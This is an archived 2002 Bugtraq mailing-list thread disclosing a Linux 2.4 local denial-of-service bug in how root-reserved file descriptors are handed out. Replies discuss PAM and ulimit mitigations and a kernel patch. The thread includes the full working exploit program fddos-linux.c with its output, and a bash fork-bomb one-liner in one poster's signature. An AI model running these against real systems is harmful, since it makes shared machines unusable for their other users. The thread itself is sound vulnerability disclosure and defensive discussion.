8703560 2002-07-07 22:54 +0200  /115 lines/ Paul Starzetz <paul@starzetz.de>
Sent by: joel@lysator.liu.se
Imported: 2002-07-08  22:14  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vendor-sec <vendor-sec@lst.de>
Recipient: Bugtraq (import) <22987>
Subject: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Paul Starzetz <paul@starzetz.de>
To: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Message-ID: <3D28AA94.8030105@starzetz.de>

Hi,

the recently mentioned problem in BSD kernels concerning the global
limit of open files seems to be present in the Linux kernel too.
However, as mentioned in the advisory about the BSD-specific problem,
the Linux kernel keeps some additional file slots reserved for the
root user. The relevant code can be found in the fs/file_table.c
source file (2.4.18):

struct file * get_empty_filp(void)
{
    static int old_max = 0;
    struct file * f;

    file_list_lock();
    if (files_stat.nr_free_files > NR_RESERVED_FILES) {
    used_one:
        f = list_entry(free_list.next, struct file, f_list);

[...]

    /*
     * Use a reserved one if we're the superuser
     */
[*]  if (files_stat.nr_free_files && !current->euid)
        goto used_one;


Grepping the source code (2.4.18) reveals that the limit is pretty low:

./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */


The problem is obviously the check for superuser privilege in the [*]
line, since every user can usually run some setuid binaries like
passwd or su.
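
A minimal illustration (hypothetical test program, not part of the
advisory): a setuid-root binary runs with euid 0 while the real uid
stays the caller's, so it passes the kernel's !current->euid check on
behalf of an unprivileged user:

#include <stdio.h>
#include <unistd.h>

int main(void)
{
    /* installed setuid root (chown root + chmod u+s), this prints the
     * caller's uid but euid=0 - exactly what the [*] line tests for */
    printf("uid=%d euid=%d\n", (int) getuid(), (int) geteuid());
    return 0;
}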

The attached code demonstrates the problem (you may need to change the 
EXECBIN and FREENUM parameters):

terminal1:

dummy:~ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),14(uucp),15(shadow),16(dialout),17(audio),42(trusted),65534(nogroup)


terminal2:

paul@dummy:~> id
uid=500(paul) gid=100(users)
paul@dummy:~> ./fddos

preforked child 0

errno 24 pid 24087 got 1021 files
errno 24 pid 24088 got 1021 files
errno 24 pid 24089 got 1021 files
errno 24 pid 24090 got 1021 files
errno 24 pid 24091 got 1021 files
errno 24 pid 24092 got 1021 files
errno 24 pid 24093 got 1021 files
errno 23 pid 24094 got 807 files


file limit reached, eating some root's fd
freeing some file descriptors...

 pid 24094 closing 809
 pid 24094 closing 808
 pid 24094 closing 807
 pid 24094 closing 806
 pid 24094 closing 805
 pid 24094 closing 804
 pid 24094 closing 803
 pid 24094 closing 802
 pid 24094 closing 801
 pid 24094 closing 800
 pid 24094 closing 799
 pid 24094 closing 798
 pid 24094 closing 797
 pid 24094 closing 796
 pid 24094 closing 795
 pid 24094 closing 794
 pid 24094 closing 793

executing /usr/bin/passwd
Old Password:

Start the fddos binary as a non-root user, then type on terminal1:

dummy:~ # id
bash: /usr/bin/id: Too many open files in system
dummy:~ # w
bash: /usr/bin/w: Too many open files in system

The system becomes unusable!


Solution: there is no temporary solution yet. There should be a global
per-user file limit, and the reserved file descriptors should be given
out under a different uid/euid policy. The NR_RESERVED_FILES limit also
seems really low to me.

Exploitability to get uid=0 has not been confirmed yet but seems
possible.


regards,

/ih
(8703560) /Paul Starzetz <paul@starzetz.de>/(Rewrapped)
Attachment (text/plain) in text 8703561
Comment in text 8704211 by Kurt Seifried <bugtraq@seifried.org>
8703561 2002-07-07 22:54 +0200  /134 lines/ Paul Starzetz <paul@starzetz.de>
Attachment filename: "fddos-linux.c"
Imported: 2002-07-08  22:14  by Brevbäraren
External recipient: bugtraq@securityfocus.com
External recipient: vendor-sec <vendor-sec@lst.de>
Recipient: Bugtraq (import) <22988>
Attachment (text/plain) to text 8703560
Subject: Attachment (fddos-linux.c) to: Linux kernels DoSable by file-max limit
------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>	/* for exit() */
#include <unistd.h>
#include <signal.h>
#include <fcntl.h>
#include <errno.h>



#define PREFORK 1			/* children that will exec the setuid binary */
#define EXECBIN "/usr/bin/passwd"	/* setuid binary to run once the table is full */
#define FREENUM 18			/* descriptors to free up for it */


/* flags set from the signal handlers */
static volatile sig_atomic_t fc = 0;	/* SIGUSR1: fork another opener */
static volatile sig_atomic_t ec = 0;	/* SIGUSR2: file table full / proceed */



void forkmore(int v)
{
    fc++;
}


void execmore(int v)
{
    ec++;
}


int main()
{
    int r, cn, pt[PREFORK];


    signal(SIGUSR1, &forkmore);
    signal(SIGUSR2, &execmore);
    printf("\n");

    for (cn = 0; cn < PREFORK; cn++) {
	if (!(r = fork())) {
	    printf("\npreforked child %d", cn);
	    fflush(stdout);
	    while (!ec) {
		usleep(100000);
	    }

	    printf("\nexecuting %s\n", EXECBIN);
	    fflush(stdout);

	    execl(EXECBIN, EXECBIN, (char *) NULL);

	    printf("\nwhat the fuck?");
	    fflush(stdout);
	    while (1)
		sleep(999999);
	    exit(1);
	} else
	    pt[cn] = r;
    }

    sleep(1);
    printf("\n\n");
    fflush(stdout);
    cn = 0;

    while (1) {
	fc = ec = 0;
	cn++;

	if (!(r = fork())) {
	    int cnt = 0, fd = 0, ofd = 0;

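	    /* eat descriptors until a limit hits: errno 24 (EMFILE) is
	     * the per-process limit, errno 23 (ENFILE) the global
	     * file-max */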
	    while (1) {
		ofd = fd;
		fd = open("/dev/null", O_RDWR);
		if (fd < 0) {
		    printf("errno %d ", errno);
		    printf("pid %d got %d files\n", getpid(), cnt);
		    fflush(stdout);

		    if (errno == ENFILE)
			kill(getppid(), SIGUSR2);
		    else
			kill(getppid(), SIGUSR1);

		    break;
		} else
		    cnt++;
	    }

	    ec = 0;

	    while (1) {
		usleep(100000);
		if (ec) {
		    printf("\nfreeing some file descriptors...\n");
		    fflush(stdout);
		    for (cn = 0; cn < FREENUM; cn++) {
			printf("\n pid %d closing %d", getpid(), ofd);
			close(ofd--);
		    }
		    ec = 0;
		    kill(getppid(), SIGUSR2);
		}
	    }

	} else {
	    while (!ec && !fc)
		usleep(100000);

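	    /* ENFILE hit: have the opener child free a few descriptors,
	     * then make the preforked children exec the setuid binary,
	     * which (running with euid 0) soaks up root's reserved fds */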
	    if (ec) {
		printf("\n\nfile limit reached, eating some root's fd");
		fflush(stdout);

		sleep(1);
		ec = 0;
		kill(r, SIGUSR2);
		while (!ec)
		    sleep(1);

		for (cn = 0; cn < PREFORK; cn++)
		    kill(pt[cn], SIGUSR2);

		while (1) {
		    sleep(999999);
		}
	    }
	}
    }

    return 0;
}
(8703561) /Paul Starzetz <paul@starzetz.de>/--------
8704211 2002-07-08 16:30 -0600  /165 lines/ Kurt Seifried <bugtraq@seifried.org>
Sent by: joel@lysator.liu.se
Imported: 2002-07-09  00:57  by Brevbäraren
External recipient: Paul Starzetz <paul@starzetz.de>
External recipient: bugtraq@securityfocus.com
External recipient: vendor-sec <vendor-sec@lst.de>
External replies to: bugtraq@seifried.org
Recipient: Bugtraq (import) <22995>
Comment on text 8703560 by Paul Starzetz <paul@starzetz.de>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: "Kurt Seifried" <bugtraq@seifried.org>
To: "Paul Starzetz" <paul@starzetz.de>, <bugtraq@securityfocus.com>,
 "vendor-sec" <vendor-sec@lst.de>
Message-ID: <001401c226cf$04b239b0$1400020a@chaser>

> Solution: there is no temporary solution yet. There should be a global
> per-user file limit, and the reserved file descriptors should be given
> out under a different uid/euid policy. The NR_RESERVED_FILES limit also
> seems really low to me.

Huh. Simply limit users; PAM provides this capability, as do most
shells. From: http://seifried.org/lasg/users/

PAM: Almost all Linux distributions ship with PAM support, making it
universally available. PAM limits provide a single standardized
interface for setting user limits: instead of having to write complex
shell configuration files (such as /etc/profile) you simply edit the
"limits.conf" file. Applying limits selectively through the command
shell is also very difficult, whereas with PAM applying limits
globally, to groups, or to individual users is quite simple.
Documentation on PAM is usually available in the "/usr/share/doc/"
tree. To enable PAM limits you need to add a line such as:

session		required	/lib/security/pam_limits.so

to the appropriate PAM configuration file (e.g. /etc/pam.d/sshd). You
can then define limits, typically in "/etc/security/limits.conf" or a
similar location. Because most of these limits are enforced by the
shell, the system cannot log all violations: you will be notified in
syslog when a user exceeds the number of times they are allowed to log
in, but you will not receive a warning if the user tries to use more
disk space than they are allowed to.

The available limits are:

  core -- Limits the core file size (KB); usually set to 0 for most users to
prevent core dumps.
  data -- Maximum data size (KB).
  fsize -- Maximum file size (KB).
  memlock -- Maximum locked-in-memory address space (KB).
  nofile -- Maximum number of open files.
  rss -- Maximum resident set size (KB).
  stack -- Maximum stack size (KB).
  cpu -- Maximum CPU time (MIN).
  nproc -- Maximum number of processes.
  as -- Address space limit.
  maxlogins -- Maximum number of logins for this user or group.
  priority -- The priority to run user process with.

For example you can limit the amount of memory that user "bob" is
allowed to use:

user		hard	memlock		4096

This would place a hard (absolute) limit of 4 megabytes on memory usage
for "bob". Limits can be placed on users by listing the user name, on
groups by using the syntax "@group", or globally by using "*".
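
For the descriptor exhaustion discussed in this thread the relevant
limit is "nofile"; a global entry such as the following (value
illustrative) keeps any single process well below the system-wide
file-max:

*		hard	nofile		1024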

Core files can be created when a program crashes. They have been used
in security exploits, overwriting system files, or by containing
sensitive information (such as passwords). You can easily disable core
dumps using PAM; generally speaking most users will not notice,
however if you have software developers they may complain.

*		hard	core		0

fsize is generally a good idea to set. Many users will have a large
filesystem quota (tens of megabytes to several hundred, or several
gigabytes), but if they are allowed to create a single file that is
abnormally large they can easily hog disk I/O resources (e.g. create a
large file and copy/delete the copy repeatedly). Setting this limit
globally can also prevent an attacker from filling up the partition
your log files are stored on; for example, if you only have a single /
partition an attacker can easily fill it up by generating a lot of
log events.

@notroot	hard	data		102400

Of course, limiting CPU time is one of the classic administrative
tasks. It is very useful for preventing runaway processes from eating
up all the CPU time, and it ensures that if a user leaves something
running in the background (such as a packet sniffer) it will
eventually be killed. Limiting CPU time has several side effects,
however, one of which is limiting the amount of time a user can spend
logged in (eventually they will run out of CPU time and the session
will be killed); this can lead to problems if users spend long periods
logged in. Also, depending on the CPU(s) present in your machine the
limits can vary greatly (one minute on a 386 is quite a bit different
than one minute on a 1.3 GHz Athlon).

@students	hard	cpu		2

Limiting the number of times a user can log in is strongly advised.
In most situations users should not need to log in to a server more
than once, and allowing them to do so lets them use more resources
than you might intend. It can also be used to detect suspicious
activity: if users know they can only log in once, then attempts to
log in multiple times can be viewed as suspicious activity (e.g. an
attacker with a stolen password trying to access the account).

@users		hard	maxlogins	1

Additionally, when someone violates this limit it will be logged in
syslog:

Apr 15 15:09:26 stench PAM_unix[9993]: (sshd) session opened for user
test by (uid=0)
Apr 15 15:09:32 stench pam_limits[10015]: Too many logins (max 1) for test

Soft limit violations will not be logged (i.e. with a soft limit of 1
and a hard limit of 2).



Bash: Bash has built-in limits, accessed via "ulimit". Any hard limits
cannot be set higher, so if you have limits defined in /etc/profile,
or in the users' .bash_profile (assuming they cannot edit/delete
.bash_profile), you can enforce limits on users with Bash shells. This
is useful for older Linux distributions that lack PAM support (however
this is increasingly rare and PAM should be used if possible). You
must also ensure that the user cannot change their login shell; if
they use "chsh" to change their shell to ksh, for example, the next
time they log in they will have no limits (assuming you have not put
limits on ksh). Documentation is available on ulimit; log in using
bash and issue:

[root@server /root]# help ulimit
ulimit: ulimit [-SHacdflmnpstuv] [limit]
    Ulimit provides control over the resources available to processes
    started by the shell, on systems that allow such control.  If an
    option is given, it is interpreted as follows:

        -S      use the `soft' resource limit
        -H      use the `hard' resource limit
        -a      all current limits are reported
        -c      the maximum size of core files created
        -d      the maximum size of a process's data segment
        -f      the maximum size of files created by the shell
        -l      the maximum size a process may lock into memory
        -m      the maximum resident set size
        -n      the maximum number of open file descriptors
        -p      the pipe buffer size
        -s      the maximum stack size
        -t      the maximum amount of cpu time in seconds
        -u      the maximum number of user processes
        -v      the size of virtual memory

    If LIMIT is given, it is the new value of the specified resource.
    Otherwise, the current value of the specified resource is
    printed.  If no option is given, then -f is assumed.  Values are
    in 1024-byte increments, except for -t, which is in seconds, -p,
    which is in increments of 512 bytes, and -u, which is an unscaled
    number of processes.

To disallow core files (by setting the maximum size to 0), for
example, you would add:

ulimit -Hc 0

To set limits globally you would need to edit "/etc/profile"; of
course this will also affect root, so be careful! To set limits on
groups you would need to add scripting to "/etc/profile" that checks
for the user's membership in a group and then applies the statements;
however, doing this with PAM is recommended as it is a lot simpler.
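
A minimal sketch of such a fragment (group name and value are
illustrative):

# /etc/profile fragment: hard-cap open files for members of one group
if id -Gn | grep -qw students; then
    ulimit -Hn 256
fi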





Kurt Seifried, kurt@seifried.org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/
(8704211) /Kurt Seifried <bugtraq@seifried.org>/(Rewrapped)
8708040 2002-07-09 11:35 +0200  /55 lines/ Aleksander Adamowski <olo@altkom.com.pl>
Sent by: joel@lysator.liu.se
Imported: 2002-07-09  20:19  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23002>
Comment on text 8704211 by Kurt Seifried <bugtraq@seifried.org>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Aleksander Adamowski <olo@altkom.com.pl>
To: bugtraq@securityfocus.com
Message-ID: <3D2AAE7E.9020200@altkom.com.pl>

Kurt Seifried wrote:

>The available limits are:
>
>  core -- Limits the core file size (KB); usually set to 0 for most users to
>prevent core dumps.
>  data -- Maximum data size (KB).
>  fsize -- Maximum file size (KB).
>  memlock -- Maximum locked-in-memory address space (KB).
>  nofile -- Maximum number of open files.
>  rss -- Maximum resident set size (KB).
>  stack -- Maximum stack size (KB).
>  cpu -- Maximum CPU time (MIN).
>  nproc -- Maximum number of processes.
>  as -- Address space limit.
>  maxlogins -- Maximum number of logins for this user or group.
>  priority -- The priority to run user process with.
>  
>
From the bash manual: "The value of limit can be a number in the unit
specified for the resource, or the value unlimited."

Having a fixed, absolute limit on the number, size, or amount of
resources isn't very flexible - it doesn't depend on the current
usage by other users.

Now imagine there are 100 users on a system, none of whom should be
trusted, and all of whom fall more or less into the same hash bucket
(so you can't differentiate using per-group limits). Now suppose that
some of them use the system frequently, some sporadically; some of
them require as many resources as possible for their work, some don't
need that much. You can't determine beforehand who will need what.

If you can't specify those limits so that they are relative to the
amount of resources available at the time of the limit check, you're
in trouble: either you leave the limits too high and one user can
bring the machine to its knees, or you set strict absolute limits and
start getting calls from frustrated users whose software doesn't work
because those limits are being enforced.

Best regards,

-- 
    Olo
        GG#: 274614
        ICQ UIN: 19780575 
        http://olo.office.altkom.com.pl
(8708040) /Aleksander Adamowski <olo@altkom.com.pl>/(Rewrapped)
8708093 2002-07-09 11:38 +0200  /30 lines/ Paul Starzetz <paul@starzetz.de>
Sent by: joel@lysator.liu.se
Imported: 2002-07-09  20:32  by Brevbäraren
External recipient: Kurt Seifried <bugtraq@seifried.org>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vendor-sec <vendor-sec@lst.de>
Recipient: Bugtraq (import) <23004>
Comment on text 8704211 by Kurt Seifried <bugtraq@seifried.org>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Paul Starzetz <paul@starzetz.de>
To: Kurt Seifried <bugtraq@seifried.org>
Cc: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Message-ID: <3D2AAF30.5040200@starzetz.de>

Kurt Seifried wrote:

>> Solution: there is no temporary solution yet. There should be a global
>> per-user file limit, and the reserved file descriptors should be given
>> out under a different uid/euid policy. The NR_RESERVED_FILES limit also
>> seems really low to me.
>
> Huh. Simply limit users; PAM provides this capability, as do most
> shells. From: http://seifried.org/lasg/users/
>
Yes, but maybe the point of my original posting was not completely
clear to everybody. Just look at the [*] line in the original post.
The problem is the policy for giving out the reserved file
descriptors. Limiting users is a well-known issue (to almost everybody
here, I think) but sometimes it is not applicable, or not even enough
to prevent this kind of DoS.

regards,

Paul Starzetz
(8708093) /Paul Starzetz <paul@starzetz.de>/--------
8708129 2002-07-08 21:30 -0400  /64 lines/ Michal Zalewski <lcamtuf@coredump.cx>
Sent by: joel@lysator.liu.se
Imported: 2002-07-09  20:38  by Brevbäraren
External recipient: Kurt Seifried <bugtraq@seifried.org>
External CC recipient: Paul Starzetz <paul@starzetz.de>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vendor-sec <vendor-sec@lst.de>
Recipient: Bugtraq (import) <23005>
Comment on text 8704211 by Kurt Seifried <bugtraq@seifried.org>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@coredump.cx>
To: Kurt Seifried <bugtraq@seifried.org>
Cc: Paul Starzetz <paul@starzetz.de>, <bugtraq@securityfocus.com>,
 vendor-sec <vendor-sec@lst.de>
Message-ID: <Pine.LNX.4.42.0207082112480.717-100000@nimue.bos.bindview.com>

On Mon, 8 Jul 2002, Kurt Seifried wrote:

> For example you can limit the amount of memory that user "bob" is allowed to
> use:
>
> user		hard	memlock		4096

Uhhh... not quite. The Linux kernel does not really provide a nice way
of enforcing per-user limits by default, IIRC (unless something changed
in the last few years ;-). Both PAM and 'ulimit' share essentially the
same interface, setrlimit(), which is mostly per-process, not per-user.
Some PAM extensions (such as the maximum number of logins) are enforced
on a per-user basis at a completely different layer. Even if you use
PAM to set a "memory limit for the group 'students'", you are
essentially setting a memory limit for each process of every logged-in
person belonging to that group.
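
To illustrate (a minimal sketch, not from the original mail; the limit
value is made up): the call below constrains only the process that
makes it, plus whatever that process forks - no user identity appears
anywhere:

#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;

    /* setrlimit() acts on the calling process and is inherited
     * across fork()/exec() - nothing here names a user */
    if (getrlimit(RLIMIT_NOFILE, &rl))
        perror("getrlimit");
    rl.rlim_cur = 64;                 /* soft cap on open files */
    if (setrlimit(RLIMIT_NOFILE, &rl))
        perror("setrlimit");
    return 0;
}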

And they can still most likely bypass your limit by putting something
smart in their .procmailrc / .forward / .qmail, or in so many other
ways.

Linux limits are basically intended to prevent accidents from
happening (such as some clueless user testing the code I have in my
signature, why not... or a mail client gone bad and eating up all
memory).

There is very little you can do to change this unless you do some
serious redesign and add very precise kernel and user-space time and
resource control (with something like per-user-per-day CPU time / file
usage / memory usage limits, peak usage limits, limits for whole groups
of users, etc). In general, the reasonable assumption is that your
*users* would prefer to use the system instead of rendering it
unusable. If you have some mission-critical tasks on the same machine
as some potentially malicious users, split them across two separate
boxes - simple. And on the box where you have malicious users, deploy
some fair time and resource sharing (perhaps a VM? ;) or simply
restrict their rights to a very basic set of tools.

> core files can be created when a program crashes. They have been used in
> security exploits, overwriting system files, or by containing sensitive
> information (such as passwords).

Hm, yes and no. Linux behaves pretty well when it comes to core files
- privileged programs generally don't drop cores, cores don't follow
symlinks, etc, etc.

> Bash has built in limits, accessed via "ulimit". Any hard limits cannot be
> set higher, so if you have limits defined in /etc/profile, or in the users
> .bash_profile (assuming they cannot edit/delete .bash_profile) you can
> enforce limits on users with Bash shells.

Even if I do 'ssh user@host bash --norc --noprofile'?:-)

-- 
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
          http://lcamtuf.coredump.cx/photo/
(8708129) /Michal Zalewski <lcamtuf@coredump.cx>/(Rewrapped)
8711522 2002-07-08 23:06 +0000  /153 lines/ <elv@openbeer.it>
Sent by: joel@lysator.liu.se
Imported: 2002-07-10  18:38  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23008>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: <elv@openbeer.it>
To: bugtraq@securityfocus.com
Message-ID: <20020708230601.19739.qmail@mail.securityfocus.com>

In-Reply-To: <3D28AA94.8030105@starzetz.de>

>Hi,
>
>the recently mentioned problem in BSD kernels concerning the global
>limit of open files seems to be present in the Linux kernel too.
>However, as mentioned in the advisory about the BSD-specific problem,
>the Linux kernel keeps some additional file slots reserved for the
>root user.
[...]
>Grepping the source code (2.4.18) reveals that the limit is pretty low:
>
>./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */
>
>
>The problem is obviously the check for superuser privilege in the [*]
>line, since every user can usually run some setuid binaries like
>passwd or su.

hi all,

the obvious solution to this problem is a proper use of setrlimit()
(ulimit):

>fddos output:

preforked child 0


errno 24 pid 896 got 29 files
errno 24 pid 897 got 29 files
errno 24 pid 898 got 29 files
errno 24 pid 899 got 29 files
errno 24 pid 900 got 29 files
errno 24 pid 901 got 29 files
errno 24 pid 902 got 29 files
errno 24 pid 903 got 29 files
errno 24 pid 904 got 29 files
errno 24 pid 905 got 29 files
errno 24 pid 906 got 29 files
errno 24 pid 907 got 29 files

>strace output:

[...]

preforked child 0rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
nanosleep({1, 0}, {1, 0})               = 0
write(1, "\n\n\n", 3)                   = 3
fork()                                  = 913
errno 24 pid 913 got 29 files
[...]
fork()                                  = -1 EAGAIN (Resource temporarily unavailable)
nanosleep({0, 100000000}, NULL)         = 0
nanosleep({0, 100000000}, NULL)         = 0
[...]

elvinho ~ $ ulimit -Ha
core file size        (blocks, -c) 0
data seg size         (kbytes, -d) 6144
file size             (blocks, -f) 32768
max locked memory     (kbytes, -l) unlimited
max memory size       (kbytes, -m) 1024
open files                    (-n) 32
pipe size          (512 bytes, -p) 8
stack size            (kbytes, -s) 4096
cpu time             (seconds, -t) 300
max user processes            (-u) 16
virtual memory        (kbytes, -v) unlimited
elvinho ~ $

You can set a ulimit mask in /etc/login.defs.


In this manner the problem is solved, but the kernel bug still
remains, so here are two little pieces of code:

--- /usr/src/linux/fs/file_table.c	Mon Sep 17 20:16:30 2001
+++ /usr/src/linux/fs/file_table.c	Mon Jul  8 23:42:01 2002
@@ -51,9 +51,12 @@
 		return f;
 	}
 	/*
-	 * Use a reserved one if we're the superuser
+	 * Use one of the first 16 reserved fds if we have euid == 0
+	 * and one of the second 16 reserved fds if we're the superuser
 	 */
-	if (files_stat.nr_free_files && !current->euid)
+	if (files_stat.nr_free_files > (NR_RESERVED_FILES/2) && !current->euid)
+		goto used_one;
+	else if (files_stat.nr_free_files <= (NR_RESERVED_FILES/2) && !current->uid)
 		goto used_one;
 	/*
 	 * Allocate a new one if we're below the limit.

--- /usr/src/linux/include/linux/fs.h	Mon Jul  1 14:48:44 2002
+++ /usr/src/linux/include/linux/fs.h	Tue Jul  9 00:07:06 2002
@@ -65,7 +65,7 @@
 extern int leases_enable, dir_notify_enable, lease_break_time;
 
 #define NR_FILE  8192	/* this can well be larger on a larger system */
-#define NR_RESERVED_FILES 10 /* reserved for root */
+#define NR_RESERVED_FILES 32 /* first 16 for euid == 0 processes and second 16 only for root */
 #define NR_SUPER 256
 
 #define MAY_EXEC 1

We check for uid == 0 because the suid bit causes the kernel to set
the euid to the uid of the binary owner:

[...]
                /* Set-uid? */
                if (mode & S_ISUID)
                        bprm->e_uid = inode->i_uid;
[...]
/usr/src/linux/fs/exec.c line 631 of 1071 (58%)


It would be a good thing if someone could post these patches to the
linux-kernel mailing list.

cheers, elv
(8711522) /<elv@openbeer.it>/-----------------------
8712572 2002-07-10 01:04 +0000  /24 lines/ Jim Breton <jamesb-bugtraq@alongtheway.com>
Sent by: joel@lysator.liu.se
Imported: 2002-07-11  01:32  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23018>
Comment on text 8708129 by Michal Zalewski <lcamtuf@coredump.cx>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Jim Breton <jamesb-bugtraq@alongtheway.com>
To: bugtraq@securityfocus.com
Message-ID: <20020710010426083150.G1304@alongtheway.com>

On Mon, Jul 08, 2002 at 09:30:34PM -0400, Michal Zalewski wrote:
> And they can still most likely bypass your limit by putting something
> smart in their .procmailrc / .forward / .qmail, or in so many other ways.

One could use 'initscript' to plug many of those holes:

INITSCRIPT(5)  Linux System Administrator's Manual  INITSCRIPT(5)

NAME
       initscript - script that executes inittab commands.

SYNOPSIS
       /bin/sh /etc/initscript id runlevels action process

       When  the  shell  script  /etc/initscript is present, init
       will use it to execute the commands  from  inittab.   This
       script  can  be  used  to set things like ulimit and umask
       default values for every process.
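
A minimal /etc/initscript along those lines (sketch; the limit values
are illustrative) might be:

# /etc/initscript: init runs every inittab entry through this script
ulimit -Hn 1024     # hard cap on open files for everything init spawns
umask 022
eval exec "$4"      # $4 is the process field of the inittab entry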
(8712572) /Jim Breton <jamesb-bugtraq@alongtheway.com>/
8712885 2002-07-10 23:07 +0200  /89 lines/ Andrea Arcangeli <andrea@suse.de>
Sent by: joel@lysator.liu.se
Imported: 2002-07-11  06:29  by Brevbäraren
External recipient: Paul Starzetz <paul@starzetz.de>
External CC recipient: bugtraq@securityfocus.com
External CC recipient: vendor-sec <vendor-sec@lst.de>
Recipient: Bugtraq (import) <23022>
Comment on text 8703560 by Paul Starzetz <paul@starzetz.de>
Subject: Re: Linux kernels DoSable by file-max limit
------------------------------------------------------------
From: Andrea Arcangeli <andrea@suse.de>
To: Paul Starzetz <paul@starzetz.de>
Cc: bugtraq@securityfocus.com, vendor-sec <vendor-sec@lst.de>
Message-ID: <20020710210741.GC1342@dualathlon.random>

On Sun, Jul 07, 2002 at 10:54:44PM +0200, Paul Starzetz wrote:
> Hi,
> 
> the recently mentioned problem in BSD kernels concerning the global
> limit of open files seems to be present in the Linux kernel too.
> However, as mentioned in the advisory about the BSD-specific problem,
> the Linux kernel keeps some additional file slots reserved for the
> root user. The relevant code can be found in the fs/file_table.c
> source file (2.4.18):
> 
> struct file * get_empty_filp(void)
> {
>    static int old_max = 0;
>    struct file * f;
> 
>    file_list_lock();
>    if (files_stat.nr_free_files > NR_RESERVED_FILES) {
>    used_one:
>        f = list_entry(free_list.next, struct file, f_list);
> 
> [...]
> 
>    /*
>     * Use a reserved one if we're the superuser
>     */
> [*]  if (files_stat.nr_free_files && !current->euid)
>        goto used_one;
> 
> 
> Grepping the source code (2.4.18) reveals that the limit is pretty low:
> 
> ./include/linux/fs.h:#define NR_RESERVED_FILES 10 /* reserved for root */

Well, that's not really secure in the first place; I mean, there's
nothing to exploit. It's more a hack to improve the chances of keeping
a usable machine as root after you hit file-max, but it's not
guaranteed to work at all, regardless of malicious or non-malicious
workloads. Linux never enforces keeping nr_free_files at a level >=
NR_RESERVED_FILES; it just tries to do that lazily, so it's not
guaranteed you will have any nr_free_files when you happen to need
them.

For example, if you keep opening files from boot onward and never
execute a single close() or exit() syscall, you will never get any
free file available, so no matter who you are (root or not), you will
never pass the test "if (files_stat.nr_free_files &&
!current->euid)", because nr_free_files will always be zero.

Furthermore, that part of the VFS file allocation management needs a
rewrite (I hope it will happen in 2.5), and the file-max limit should
go away just as inode-max went away in 2.3. At the moment released
files have no way to be freed dynamically, and that's not good. There
should be a proper slab cache, and fput should kmem_cache_free the
file instead of putting it onto the unshrinkable
"file_table.c::free_list". But this is more a linux-kernel topic...

Once it is possible to shrink the pool of released files, the file-max
limit can go away (we need it now because otherwise all RAM could be
pinned in this unshrinkable "free_list"). Then, if you allocate all
the RAM into files, you will run the machine out of memory at some
point, which moves the DoS issue elsewhere: into the memory management
area. It becomes a generic problem, no longer specific to file
allocations. After you hit the OOM point, even if you could allocate
the file from a root-reserved pool, you might still be unable to
allocate the dentry and the inode.

Anyway, regardless of the possible memory-management OOM DoSes (when
running out of RAM resources), removing file-max is a goodness because
it makes Linux much more usable: if you need lots of files during a
temporary spike of load, you won't be left with a huge leak of files
hanging around; the VM will shrink them as you need more RAM later.
And if you hit OOM, it's very likely (though not guaranteed, also
considering the different algorithms for handling OOM conditions, some
deadlock-prone, some not) that the offending task will be killed too,
rendering any malicious attack much less reproducible than it is now.

> [..]
> Exploitability to get uid=0 has not been confirmed yet but seems possible.

If that's the case, it's a userspace bug in the suid apps that you're
executing; it's certainly not a kernel issue.

Andrea
(8712885) /Andrea Arcangeli <andrea@suse.de>/(Rewrapped)